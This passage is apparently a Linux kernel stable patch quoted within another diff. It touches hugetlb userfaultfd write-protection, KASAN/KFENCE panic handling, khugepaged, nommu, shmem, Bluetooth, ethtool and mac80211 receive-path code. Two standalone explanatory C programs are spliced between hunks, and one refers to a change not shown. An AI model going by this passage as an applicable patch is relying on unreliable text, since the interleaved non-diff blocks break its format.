+ 		ptep = huge_pte_offset(mm, address, psize);
+ 		if (!ptep) {
+-			address |= last_addr_mask;
+-			continue;
++			if (!uffd_wp) {
++				address |= last_addr_mask;
++				continue;
++			}
++			/*
++			 * Userfaultfd wr-protect requires pgtable
++			 * pre-allocations to install pte markers.
++			 */
++			ptep = huge_pte_alloc(mm, vma, address, psize);
++			if (!ptep)
++				break;
+ 		}
+ 		ptl = huge_pte_lock(h, mm, ptep);
+ 		if (huge_pmd_unshare(mm, vma, address, ptep)) {
+@@ -6602,16 +6632,13 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 		}
+ 		pte = huge_ptep_get(ptep);
+ 		if (unlikely(is_hugetlb_entry_hwpoisoned(pte))) {
+-			spin_unlock(ptl);
+-			continue;
+-		}
+-		if (unlikely(is_hugetlb_entry_migration(pte))) {
++			/* Nothing to do. */
++		} else if (unlikely(is_hugetlb_entry_migration(pte))) {
+ 			swp_entry_t entry = pte_to_swp_entry(pte);
+ 			struct page *page = pfn_swap_entry_to_page(entry);
++			pte_t newpte = pte;
+ 
+-			if (!is_readable_migration_entry(entry)) {
+-				pte_t newpte;
+-
++			if (is_writable_migration_entry(entry)) {
+ 				if (PageAnon(page))
+ 					entry = make_readable_exclusive_migration_entry(
+ 								swp_offset(entry));
+@@ -6619,25 +6646,22 @@ unsigned long hugetlb_change_protection(struct vm_area_struct *vma,
+ 					entry = make_readable_migration_entry(
+ 								swp_offset(entry));
+ 				newpte = swp_entry_to_pte(entry);
+-				if (uffd_wp)
+-					newpte = pte_swp_mkuffd_wp(newpte);
+-				else if (uffd_wp_resolve)
+-					newpte = pte_swp_clear_uffd_wp(newpte);
+-				set_huge_pte_at(mm, address, ptep, newpte);
+ 				pages++;
+ 			}
+-			spin_unlock(ptl);
+-			continue;
+-		}
+-		if (unlikely(pte_marker_uffd_wp(pte))) {
+-			/*
+-			 * This is changing a non-present pte into a none pte,
+-			 * no need for huge_ptep_modify_prot_start/commit().
+-			 */
++
++			if (uffd_wp)
++				newpte = pte_swp_mkuffd_wp(newpte);
++			else if (uffd_wp_resolve)
++				newpte = pte_swp_clear_uffd_wp(newpte);
++			if (!pte_same(pte, newpte))
++				set_huge_pte_at(mm, address, ptep, newpte);
++		} else if (unlikely(is_pte_marker(pte))) {
++			/* No other markers apply for now. */
++			WARN_ON_ONCE(!pte_marker_uffd_wp(pte));
+ 			if (uffd_wp_resolve)
++				/* Safe to modify directly (non-present->none). */
+ 				huge_pte_clear(mm, address, ptep, psize);
+-		}
+-		if (!huge_pte_none(pte)) {
++		} else if (!huge_pte_none(pte)) {
+ 			pte_t old_pte;
+ 			unsigned int shift = huge_page_shift(hstate_vma(vma));
+ 
+@@ -7386,26 +7410,21 @@ void move_hugetlb_state(struct page *oldpage, struct page *newpage, int reason)
+ 	}
+ }
+ 
+-/*
+- * This function will unconditionally remove all the shared pmd pgtable entries
+- * within the specific vma for a hugetlbfs memory range.
+- */
+-void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
++static void hugetlb_unshare_pmds(struct vm_area_struct *vma,
++				   unsigned long start,
++				   unsigned long end)
+ {
+ 	struct hstate *h = hstate_vma(vma);
+ 	unsigned long sz = huge_page_size(h);
+ 	struct mm_struct *mm = vma->vm_mm;
+ 	struct mmu_notifier_range range;
+-	unsigned long address, start, end;
++	unsigned long address;
+ 	spinlock_t *ptl;
+ 	pte_t *ptep;
+ 
+ 	if (!(vma->vm_flags & VM_MAYSHARE))
+ 		return;
+ 
+-	start = ALIGN(vma->vm_start, PUD_SIZE);
+-	end = ALIGN_DOWN(vma->vm_end, PUD_SIZE);
+-
+ 	if (start >= end)
+ 		return;
+ 
+@@ -7437,6 +7456,16 @@ void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
+ 	mmu_notifier_invalidate_range_end(&range);
+ }
+ 
++/*
++ * This function will unconditionally remove all the shared pmd pgtable entries
++ * within the specific vma for a hugetlbfs memory range.
++ */
++void hugetlb_unshare_all_pmds(struct vm_area_struct *vma)
++{
++	hugetlb_unshare_pmds(vma, ALIGN(vma->vm_start, PUD_SIZE),
++			ALIGN_DOWN(vma->vm_end, PUD_SIZE));
++}
++
+ #ifdef CONFIG_CMA
+ static bool cma_reserve_called __initdata;
+ 
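/*
 * The hugetlb_vm_op_split() change above turns on the PUD_SIZE alignment
 * arithmetic described in its comment. A standalone worked example of the
 * floor/ceil computation, assuming x86-64's 1 GiB PUD_SIZE (illustration
 * only, not part of the patch):
 */
#include <stdio.h>

int main(void)
{
	unsigned long pud_size = 1UL << 30;       /* assumed PUD_SIZE */
	unsigned long pud_mask = ~(pud_size - 1); /* assumed PUD_MASK */
	unsigned long addr = 0x40001000UL;        /* unaligned split point */
	unsigned long floor = addr & pud_mask;
	unsigned long ceil = floor + pud_size;

	/* PMDs may only be shared inside a fully covered PUD_SIZE interval */
	printf("unshare PMDs in [%#lx, %#lx)\n", floor, ceil);
	return 0;
}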
+diff --git a/mm/kasan/report.c b/mm/kasan/report.c
+index df3602062bfd6..cc98dfdd3ed2f 100644
+--- a/mm/kasan/report.c
++++ b/mm/kasan/report.c
+@@ -164,8 +164,8 @@ static void end_report(unsigned long *flags, void *addr)
+ 				       (unsigned long)addr);
+ 	pr_err("==================================================================\n");
+ 	spin_unlock_irqrestore(&report_lock, *flags);
+-	if (panic_on_warn && !test_bit(KASAN_BIT_MULTI_SHOT, &kasan_flags))
+-		panic("panic_on_warn set ...\n");
++	if (!test_bit(KASAN_BIT_MULTI_SHOT, &kasan_flags))
++		check_panic_on_warn("KASAN");
+ 	if (kasan_arg_fault == KASAN_ARG_FAULT_PANIC)
+ 		panic("kasan.fault=panic set ...\n");
+ 	add_taint(TAINT_BAD_PAGE, LOCKDEP_NOW_UNRELIABLE);
+diff --git a/mm/kfence/report.c b/mm/kfence/report.c
+index 46ecea18c4ca0..60205f1257ef2 100644
+--- a/mm/kfence/report.c
++++ b/mm/kfence/report.c
+@@ -273,8 +273,7 @@ void kfence_report_error(unsigned long address, bool is_write, struct pt_regs *r
+ 
+ 	lockdep_on();
+ 
+-	if (panic_on_warn)
+-		panic("panic_on_warn set ...\n");
++	check_panic_on_warn("KFENCE");
+ 
+ 	/* We encountered a memory safety error, taint the kernel! */
+ 	add_taint(TAINT_BAD_PAGE, LOCKDEP_STILL_OK);
+diff --git a/mm/khugepaged.c b/mm/khugepaged.c
+index 3703a56571c12..c982b250aa317 100644
+--- a/mm/khugepaged.c
++++ b/mm/khugepaged.c
+@@ -1467,14 +1467,6 @@ int collapse_pte_mapped_thp(struct mm_struct *mm, unsigned long addr,
+ 	if (!hugepage_vma_check(vma, vma->vm_flags, false, false, false))
+ 		return SCAN_VMA_CHECK;
+ 
+-	/*
+-	 * Symmetry with retract_page_tables(): Exclude MAP_PRIVATE mappings
+-	 * that got written to. Without this, we'd have to also lock the
+-	 * anon_vma if one exists.
+-	 */
+-	if (vma->anon_vma)
+-		return SCAN_VMA_CHECK;
+-
+ 	/* Keep pmd pgtable for uffd-wp; see comment in retract_page_tables() */
+ 	if (userfaultfd_wp(vma))
+ 		return SCAN_PTE_UFFD_WP;
+@@ -1574,8 +1566,14 @@ int collapse_pte_mapped_thp(struct mm_struct *mm, unsigned long addr,
+ 	}
+ 
+ 	/* step 4: remove pte entries */
++	/* we make no change to anon, but protect concurrent anon page lookup */
++	if (vma->anon_vma)
++		anon_vma_lock_write(vma->anon_vma);
++
+ 	collapse_and_free_pmd(mm, vma, haddr, pmd);
+ 
++	if (vma->anon_vma)
++		anon_vma_unlock_write(vma->anon_vma);
+ 	i_mmap_unlock_write(vma->vm_file->f_mapping);
+ 
+ maybe_install_pmd:
+@@ -2646,7 +2644,7 @@ int madvise_collapse(struct vm_area_struct *vma, struct vm_area_struct **prev,
+ 				goto out_nolock;
+ 			}
+ 
+-			hend = vma->vm_end & HPAGE_PMD_MASK;
++			hend = min(hend, vma->vm_end & HPAGE_PMD_MASK);
+ 		}
+ 		mmap_assert_locked(mm);
+ 		memset(cc->node_load, 0, sizeof(cc->node_load));
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 54abd46e60078..1777148868494 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -1524,6 +1524,10 @@ int vma_wants_writenotify(struct vm_area_struct *vma, pgprot_t vm_page_prot)
+ 	if (vma_soft_dirty_enabled(vma) && !is_vm_hugetlb_page(vma))
+ 		return 1;
+ 
++	/* Do we need write faults for uffd-wp tracking? */
++	if (userfaultfd_wp(vma))
++		return 1;
++
+ 	/* Specialty mapping? */
+ 	if (vm_flags & VM_PFNMAP)
+ 		return 0;
+diff --git a/mm/nommu.c b/mm/nommu.c
+index 214c70e1d0594..5b83938ecb67c 100644
+--- a/mm/nommu.c
++++ b/mm/nommu.c
+@@ -559,7 +559,6 @@ void vma_mas_remove(struct vm_area_struct *vma, struct ma_state *mas)
+ 
+ static void setup_vma_to_mm(struct vm_area_struct *vma, struct mm_struct *mm)
+ {
+-	mm->map_count++;
+ 	vma->vm_mm = mm;
+ 
+ 	/* add the VMA to the mapping */
+@@ -587,6 +586,7 @@ static void mas_add_vma_to_mm(struct ma_state *mas, struct mm_struct *mm,
+ 	BUG_ON(!vma->vm_region);
+ 
+ 	setup_vma_to_mm(vma, mm);
++	mm->map_count++;
+ 
+ 	/* add the VMA to the tree */
+ 	vma_mas_store(vma, mas);
+@@ -1240,6 +1240,7 @@ share:
+ error_just_free:
+ 	up_write(&nommu_region_sem);
+ error:
++	mas_destroy(&mas);
+ 	if (region->vm_file)
+ 		fput(region->vm_file);
+ 	kmem_cache_free(vm_region_jar, region);
+@@ -1250,7 +1251,6 @@ error:
+ 
+ sharing_violation:
+ 	up_write(&nommu_region_sem);
+-	mas_destroy(&mas);
+ 	pr_warn("Attempt to share mismatched mappings\n");
+ 	ret = -EINVAL;
+ 	goto error;
+@@ -1347,6 +1347,7 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	if (vma->vm_file)
+ 		return -ENOMEM;
+ 
++	mm = vma->vm_mm;
+ 	if (mm->map_count >= sysctl_max_map_count)
+ 		return -ENOMEM;
+ 
+@@ -1398,6 +1399,7 @@ int split_vma(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	mas_set_range(&mas, vma->vm_start, vma->vm_end - 1);
+ 	mas_store(&mas, vma);
+ 	vma_mas_store(new, &mas);
++	mm->map_count++;
+ 	return 0;
+ 
+ err_mas_preallocate:
+@@ -1509,7 +1511,8 @@ int do_munmap(struct mm_struct *mm, unsigned long start, size_t len, struct list
+ erase_whole_vma:
+ 	if (delete_vma_from_mm(vma))
+ 		ret = -ENOMEM;
+-	delete_vma(mm, vma);
++	else
++		delete_vma(mm, vma);
+ 	return ret;
+ }
+ 
+diff --git a/mm/shmem.c b/mm/shmem.c
+index 82911fefc2d5e..a8d9fd039d0aa 100644
+--- a/mm/shmem.c
++++ b/mm/shmem.c
+@@ -472,12 +472,10 @@ bool shmem_is_huge(struct vm_area_struct *vma, struct inode *inode,
+ 	if (vma && ((vma->vm_flags & VM_NOHUGEPAGE) ||
+ 	    test_bit(MMF_DISABLE_THP, &vma->vm_mm->flags)))
+ 		return false;
+-	if (shmem_huge_force)
+-		return true;
+-	if (shmem_huge == SHMEM_HUGE_FORCE)
+-		return true;
+ 	if (shmem_huge == SHMEM_HUGE_DENY)
+ 		return false;
++	if (shmem_huge_force || shmem_huge == SHMEM_HUGE_FORCE)
++		return true;
+ 
+ 	switch (SHMEM_SB(inode->i_sb)->huge) {
+ 	case SHMEM_HUGE_ALWAYS:
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 3a68d9bc43b8f..8d6c8cbfe1de4 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -3554,7 +3554,7 @@ static const struct hci_init_stage hci_init2[] = {
+ static int hci_le_read_buffer_size_sync(struct hci_dev *hdev)
+ {
+ 	/* Use Read LE Buffer Size V2 if supported */
+-	if (hdev->commands[41] & 0x20)
++	if (iso_capable(hdev) && hdev->commands[41] & 0x20)
+ 		return __hci_cmd_sync_status(hdev,
+ 					     HCI_OP_LE_READ_BUFFER_SIZE_V2,
+ 					     0, NULL, HCI_CMD_TIMEOUT);
+@@ -3579,10 +3579,10 @@ static int hci_le_read_supported_states_sync(struct hci_dev *hdev)
+ 
+ /* LE Controller init stage 2 command sequence */
+ static const struct hci_init_stage le_init2[] = {
+-	/* HCI_OP_LE_READ_BUFFER_SIZE */
+-	HCI_INIT(hci_le_read_buffer_size_sync),
+ 	/* HCI_OP_LE_READ_LOCAL_FEATURES */
+ 	HCI_INIT(hci_le_read_local_features_sync),
++	/* HCI_OP_LE_READ_BUFFER_SIZE */
++	HCI_INIT(hci_le_read_buffer_size_sync),
+ 	/* HCI_OP_LE_READ_SUPPORTED_STATES */
+ 	HCI_INIT(hci_le_read_supported_states_sync),
+ 	{}
+diff --git a/net/ethtool/ioctl.c b/net/ethtool/ioctl.c
+index 81fe2422fe58a..038398d41a937 100644
+--- a/net/ethtool/ioctl.c
++++ b/net/ethtool/ioctl.c
+@@ -2094,7 +2094,8 @@ static int ethtool_get_phy_stats(struct net_device *dev, void __user *useraddr)
+ 		return n_stats;
+ 	if (n_stats > S32_MAX / sizeof(u64))
+ 		return -ENOMEM;
+-	WARN_ON_ONCE(!n_stats);
++	if (WARN_ON_ONCE(!n_stats))
++		return -EOPNOTSUPP;
+ 
+ 	if (copy_from_user(&stats, useraddr, sizeof(stats)))
+ 		return -EFAULT;
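/*
 * The ethtool hunk above leans on WARN_ON_ONCE() evaluating to its
 * condition, so a single expression both logs a one-time warning and gates
 * an early error return. A userspace approximation of that idiom (the real
 * macro also dumps a backtrace and taints the kernel; this is a sketch
 * only):
 */
#include <stdio.h>

#define WARN_ON_ONCE(cond) ({                            \
	static int __warned;                             \
	int __hit = !!(cond);                            \
	if (__hit && !__warned) {                        \
		__warned = 1;                            \
		fprintf(stderr, "WARNING: %s\n", #cond); \
	}                                                \
	__hit;                                           \
})

static int get_stats(int n_stats)
{
	if (WARN_ON_ONCE(!n_stats))
		return -95; /* mirrors -EOPNOTSUPP */
	return n_stats;
}

int main(void)
{
	printf("%d %d %d\n", get_stats(0), get_stats(0), get_stats(4));
	return 0;
}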
+diff --git a/net/ipv4/tcp_ulp.c b/net/ipv4/tcp_ulp.c
+index 05b6077b9f2c3..2aa442128630e 100644
+--- a/net/ipv4/tcp_ulp.c
++++ b/net/ipv4/tcp_ulp.c
+@@ -139,7 +139,7 @@ static int __tcp_set_ulp(struct sock *sk, const struct tcp_ulp_ops *ulp_ops)
+ 	if (sk->sk_socket)
+ 		clear_bit(SOCK_SUPPORT_ZC, &sk->sk_socket->flags);
+ 
+-	err = -EINVAL;
++	err = -ENOTCONN;
+ 	if (!ulp_ops->clone && sk->sk_state == TCP_LISTEN)
+ 		goto out_err;
+ 
+diff --git a/net/mac80211/agg-tx.c b/net/mac80211/agg-tx.c
+index 07c892aa8c73f..b2e40465289d6 100644
+--- a/net/mac80211/agg-tx.c
++++ b/net/mac80211/agg-tx.c
+@@ -491,7 +491,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ {
+ 	struct tid_ampdu_tx *tid_tx;
+ 	struct ieee80211_local *local = sta->local;
+-	struct ieee80211_sub_if_data *sdata = sta->sdata;
++	struct ieee80211_sub_if_data *sdata;
+ 	struct ieee80211_ampdu_params params = {
+ 		.sta = &sta->sta,
+ 		.action = IEEE80211_AMPDU_TX_START,
+@@ -521,6 +521,7 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 	 */
+ 	synchronize_net();
+ 
++	sdata = sta->sdata;
+ 	params.ssn = sta->tid_seq[tid] >> 4;
+ 	ret = drv_ampdu_action(local, sdata, &params);
+ 	tid_tx->ssn = params.ssn;
+@@ -534,6 +535,9 @@ void ieee80211_tx_ba_session_handle_start(struct sta_info *sta, int tid)
+ 		 */
+ 		set_bit(HT_AGG_STATE_DRV_READY, &tid_tx->state);
+ 	} else if (ret) {
++		if (!sdata)
++			return;
++
+ 		ht_dbg(sdata,
+ 		       "BA request denied - HW unavailable for %pM tid %d\n",
+ 		       sta->sta.addr, tid);
+diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
+index 8c8ef87997a8a..3c66e03774fbe 100644
+--- a/net/mac80211/cfg.c
++++ b/net/mac80211/cfg.c
+@@ -147,6 +147,7 @@ static int ieee80211_set_ap_mbssid_options(struct ieee80211_sub_if_data *sdata,
+ 	link_conf->bssid_index = 0;
+ 	link_conf->nontransmitted = false;
+ 	link_conf->ema_ap = false;
++	link_conf->bssid_indicator = 0;
+ 
+ 	if (sdata->vif.type != NL80211_IFTYPE_AP || !params.tx_wdev)
+ 		return -EINVAL;
+@@ -1511,6 +1512,12 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev,
+ 	kfree(link_conf->ftmr_params);
+ 	link_conf->ftmr_params = NULL;
+ 
++	sdata->vif.mbssid_tx_vif = NULL;
++	link_conf->bssid_index = 0;
++	link_conf->nontransmitted = false;
++	link_conf->ema_ap = false;
++	link_conf->bssid_indicator = 0;
++
+ 	__sta_info_flush(sdata, true);
+ 	ieee80211_free_keys(sdata, true);
+ 
+diff --git a/net/mac80211/driver-ops.c b/net/mac80211/driver-ops.c
+index 5392ffa182704..c08d3c9a4a177 100644
+--- a/net/mac80211/driver-ops.c
++++ b/net/mac80211/driver-ops.c
+@@ -391,6 +391,9 @@ int drv_ampdu_action(struct ieee80211_local *local,
+ 
+ 	might_sleep();
+ 
++	if (!sdata)
++		return -EIO;
++
+ 	sdata = get_bss_sdata(sdata);
+ 	if (!check_sdata_in_driver(sdata))
+ 		return -EIO;
+diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c
+index 46f08ec5ed760..8dd3c10a99e0b 100644
+--- a/net/mac80211/iface.c
++++ b/net/mac80211/iface.c
+@@ -364,7 +364,9 @@ static int ieee80211_check_concurrent_iface(struct ieee80211_sub_if_data *sdata,
+ 
+ 			/* No support for VLAN with MLO yet */
+ 			if (iftype == NL80211_IFTYPE_AP_VLAN &&
+-			    nsdata->wdev.use_4addr)
++			    sdata->wdev.use_4addr &&
++			    nsdata->vif.type == NL80211_IFTYPE_AP &&
++			    nsdata->vif.valid_links)
+ 				return -EOPNOTSUPP;
+ 
+ 			/*
+@@ -2258,7 +2260,6 @@ int ieee80211_if_add(struct ieee80211_local *local, const char *name,
+ 
+ 		ret = cfg80211_register_netdevice(ndev);
+ 		if (ret) {
+-			ieee80211_if_free(ndev);
+ 			free_netdev(ndev);
+ 			return ret;
+ 		}
+diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
+index f99416d2e1441..3262ebb240926 100644
+--- a/net/mac80211/rx.c
++++ b/net/mac80211/rx.c
+@@ -4070,6 +4070,58 @@ static void ieee80211_invoke_rx_handlers(struct ieee80211_rx_data *rx)
+ #undef CALL_RXH
+ }
+ 
++static bool
++ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
++{
++	if (!sta->mlo)
++		return false;
++
++	return !!(sta->valid_links & BIT(link_id));
++}
++
++static bool ieee80211_rx_data_set_link(struct ieee80211_rx_data *rx,
++				       u8 link_id)
++{
++	rx->link_id = link_id;
++	rx->link = rcu_dereference(rx->sdata->link[link_id]);
++
++	if (!rx->sta)
++		return rx->link;
++
++	if (!ieee80211_rx_is_valid_sta_link_id(&rx->sta->sta, link_id))
++		return false;
++
++	rx->link_sta = rcu_dereference(rx->sta->link[link_id]);
++
++	return rx->link && rx->link_sta;
++}
++
++static bool ieee80211_rx_data_set_sta(struct ieee80211_rx_data *rx,
++				      struct ieee80211_sta *pubsta,
++				      int link_id)
++{
++	struct sta_info *sta;
++
++	sta = container_of(pubsta, struct sta_info, sta);
++
++	rx->link_id = link_id;
++	rx->sta = sta;
++
++	if (sta) {
++		rx->local = sta->sdata->local;
++		if (!rx->sdata)
++			rx->sdata = sta->sdata;
++		rx->link_sta = &sta->deflink;
++	}
++
++	if (link_id < 0)
++		rx->link = &rx->sdata->deflink;
++	else if (!ieee80211_rx_data_set_link(rx, link_id))
++		return false;
++
++	return true;
++}
++
+ /*
+  * This function makes calls into the RX path, therefore
+  * it has to be invoked under RCU read lock.
+@@ -4078,16 +4130,19 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ {
+ 	struct sk_buff_head frames;
+ 	struct ieee80211_rx_data rx = {
+-		.sta = sta,
+-		.sdata = sta->sdata,
+-		.local = sta->local,
+ 		/* This is OK -- must be QoS data frame */
+ 		.security_idx = tid,
+ 		.seqno_idx = tid,
+-		.link_id = -1,
+ 	};
+ 	struct tid_ampdu_rx *tid_agg_rx;
+-	u8 link_id;
++	int link_id = -1;
++
++	/* FIXME: statistics won't be right with this */
++	if (sta->sta.valid_links)
++		link_id = ffs(sta->sta.valid_links) - 1;
++
++	if (!ieee80211_rx_data_set_sta(&rx, &sta->sta, link_id))
++		return;
+ 
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+ 	if (!tid_agg_rx)
+@@ -4107,10 +4162,6 @@ void ieee80211_release_reorder_timeout(struct sta_info *sta, int tid)
+ 		};
+ 		drv_event_callback(rx.local, rx.sdata, &event);
+ 	}
+-	/* FIXME: statistics won't be right with this */
+-	link_id = sta->sta.valid_links ? ffs(sta->sta.valid_links) - 1 : 0;
+-	rx.link = rcu_dereference(sta->sdata->link[link_id]);
+-	rx.link_sta = rcu_dereference(sta->link[link_id]);
+ 
+ 	ieee80211_rx_handlers(&rx, &frames);
+ }
+@@ -4126,7 +4177,6 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 		/* This is OK -- must be QoS data frame */
+ 		.security_idx = tid,
+ 		.seqno_idx = tid,
+-		.link_id = -1,
+ 	};
+ 	int i, diff;
+ 
+@@ -4137,10 +4187,8 @@ void ieee80211_mark_rx_ba_filtered_frames(struct ieee80211_sta *pubsta, u8 tid,
+ 
+ 	sta = container_of(pubsta, struct sta_info, sta);
+ 
+-	rx.sta = sta;
+-	rx.sdata = sta->sdata;
+-	rx.link = &rx.sdata->deflink;
+-	rx.local = sta->local;
++	if (!ieee80211_rx_data_set_sta(&rx, pubsta, -1))
++		return;
+ 
+ 	rcu_read_lock();
+ 	tid_agg_rx = rcu_dereference(sta->ampdu_mlme.tid_rx[tid]);
+@@ -4527,15 +4575,6 @@ void ieee80211_check_fast_rx_iface(struct ieee80211_sub_if_data *sdata)
+ 	mutex_unlock(&local->sta_mtx);
+ }
+ 
+-static bool
+-ieee80211_rx_is_valid_sta_link_id(struct ieee80211_sta *sta, u8 link_id)
+-{
+-	if (!sta->mlo)
+-		return false;
+-
+-	return !!(sta->valid_links & BIT(link_id));
+-}
+-
+ static void ieee80211_rx_8023(struct ieee80211_rx_data *rx,
+ 			      struct ieee80211_fast_rx *fast_rx,
+ 			      int orig_len)
+@@ -4646,7 +4685,6 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+ 	struct sk_buff *skb = rx->skb;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+-	struct sta_info *sta = rx->sta;
+ 	int orig_len = skb->len;
+ 	int hdrlen = ieee80211_hdrlen(hdr->frame_control);
+ 	int snap_offs = hdrlen;
+@@ -4658,7 +4696,6 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+ 		u8 da[ETH_ALEN];
+ 		u8 sa[ETH_ALEN];
+ 	} addrs __aligned(2);
+-	struct link_sta_info *link_sta;
+ 	struct ieee80211_sta_rx_stats *stats;
+ 
+ 	/* for parallel-rx, we need to have DUP_VALIDATED, otherwise we write
+@@ -4761,18 +4798,10 @@ static bool ieee80211_invoke_fast_rx(struct ieee80211_rx_data *rx,
+  drop:
+ 	dev_kfree_skb(skb);
+ 
+-	if (rx->link_id >= 0) {
+-		link_sta = rcu_dereference(sta->link[rx->link_id]);
+-		if (!link_sta)
+-			return true;
+-	} else {
+-		link_sta = &sta->deflink;
+-	}
+-
+ 	if (fast_rx->uses_rss)
+-		stats = this_cpu_ptr(link_sta->pcpu_rx_stats);
++		stats = this_cpu_ptr(rx->link_sta->pcpu_rx_stats);
+ 	else
+-		stats = &link_sta->rx_stats;
++		stats = &rx->link_sta->rx_stats;
+ 
+ 	stats->dropped++;
+ 	return true;
+@@ -4790,8 +4819,8 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	struct ieee80211_local *local = rx->local;
+ 	struct ieee80211_sub_if_data *sdata = rx->sdata;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
+-	struct link_sta_info *link_sta = NULL;
+-	struct ieee80211_link_data *link;
++	struct link_sta_info *link_sta = rx->link_sta;
++	struct ieee80211_link_data *link = rx->link;
+ 
+ 	rx->skb = skb;
+ 
+@@ -4813,35 +4842,6 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 	if (!ieee80211_accept_frame(rx))
+ 		return false;
+ 
+-	if (rx->link_id >= 0) {
+-		link = rcu_dereference(rx->sdata->link[rx->link_id]);
+-
+-		/* we might race link removal */
+-		if (!link)
+-			return true;
+-		rx->link = link;
+-
+-		if (rx->sta) {
+-			rx->link_sta =
+-				rcu_dereference(rx->sta->link[rx->link_id]);
+-			if (!rx->link_sta)
+-				return true;
+-		}
+-	} else {
+-		if (rx->sta)
+-			rx->link_sta = &rx->sta->deflink;
+-
+-		rx->link = &sdata->deflink;
+-	}
+-
+-	if (unlikely(!is_multicast_ether_addr(hdr->addr1) &&
+-		     rx->link_id >= 0 && rx->sta && rx->sta->sta.mlo)) {
+-		link_sta = rcu_dereference(rx->sta->link[rx->link_id]);
+-
+-		if (WARN_ON_ONCE(!link_sta))
+-			return true;
+-	}
+-
+ 	if (!consume) {
+ 		struct skb_shared_hwtstamps *shwt;
+ 
+@@ -4861,7 +4861,7 @@ static bool ieee80211_prepare_and_rx_handle(struct ieee80211_rx_data *rx,
+ 		shwt->hwtstamp = skb_hwtstamps(skb)->hwtstamp;
+ 	}
+ 
+-	if (unlikely(link_sta)) {
++	if (unlikely(rx->sta && rx->sta->sta.mlo)) {
+ 		/* translate to MLD addresses */
+ 		if (ether_addr_equal(link->conf->addr, hdr->addr1))
+ 			ether_addr_copy(hdr->addr1, rx->sdata->vif.addr);
+@@ -4891,6 +4891,7 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 	struct ieee80211_fast_rx *fast_rx;
+ 	struct ieee80211_rx_data rx;
++	int link_id = -1;
+ 
+ 	memset(&rx, 0, sizeof(rx));
+ 	rx.skb = skb;
+@@ -4907,12 +4908,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	if (!pubsta)
+ 		goto drop;
+ 
+-	rx.sta = container_of(pubsta, struct sta_info, sta);
+-	rx.sdata = rx.sta->sdata;
+-
+-	if (status->link_valid &&
+-	    !ieee80211_rx_is_valid_sta_link_id(pubsta, status->link_id))
+-		goto drop;
++	if (status->link_valid)
++		link_id = status->link_id;
+ 
+ 	/*
+ 	 * TODO: Should the frame be dropped if the right link_id is not
+@@ -4921,19 +4918,8 @@ static void __ieee80211_rx_handle_8023(struct ieee80211_hw *hw,
+ 	 * link_id is used only for stats purpose and updating the stats on
+ 	 * the deflink is fine?
+ 	 */
+-	if (status->link_valid)
+-		rx.link_id = status->link_id;
+-
+-	if (rx.link_id >= 0) {
+-		struct ieee80211_link_data *link;
+-
+-		link =  rcu_dereference(rx.sdata->link[rx.link_id]);
+-		if (!link)
+-			goto drop;
+-		rx.link = link;
+-	} else {
+-		rx.link = &rx.sdata->deflink;
+-	}
++	if (!ieee80211_rx_data_set_sta(&rx, pubsta, link_id))
++		goto drop;
+ 
+ 	fast_rx = rcu_dereference(rx.sta->fast_rx);
+ 	if (!fast_rx)
+@@ -4951,6 +4937,8 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ {
+ 	struct link_sta_info *link_sta;
+ 	struct ieee80211_hdr *hdr = (void *)skb->data;
++	struct sta_info *sta;
++	int link_id = -1;
+ 
+ 	/*
+ 	 * Look up link station first, in case there's a
+@@ -4960,24 +4948,19 @@ static bool ieee80211_rx_for_interface(struct ieee80211_rx_data *rx,
+ 	 */
+ 	link_sta = link_sta_info_get_bss(rx->sdata, hdr->addr2);
+ 	if (link_sta) {
+-		rx->sta = link_sta->sta;
+-		rx->link_id = link_sta->link_id;
++		sta = link_sta->sta;
++		link_id = link_sta->link_id;
+ 	} else {
+ 		struct ieee80211_rx_status *status = IEEE80211_SKB_RXCB(skb);
+ 
+-		rx->sta = sta_info_get_bss(rx->sdata, hdr->addr2);
+-		if (rx->sta) {
+-			if (status->link_valid &&
+-			    !ieee80211_rx_is_valid_sta_link_id(&rx->sta->sta,
+-							       status->link_id))
+-				return false;
+-
+-			rx->link_id = status->link_valid ? status->link_id : -1;
+-		} else {
+-			rx->link_id = -1;
+-		}
++		sta = sta_info_get_bss(rx->sdata, hdr->addr2);
++		if (status->link_valid)
++			link_id = status->link_id;
+ 	}
+ 
++	if (!ieee80211_rx_data_set_sta(rx, &sta->sta, link_id))
++		return false;
++
+ 	return ieee80211_prepare_and_rx_handle(rx, skb, consume);
+ }
+ 
+@@ -5036,19 +5019,15 @@ static void __ieee80211_rx_handle_packet(struct ieee80211_hw *hw,
+ 
+ 	if (ieee80211_is_data(fc)) {
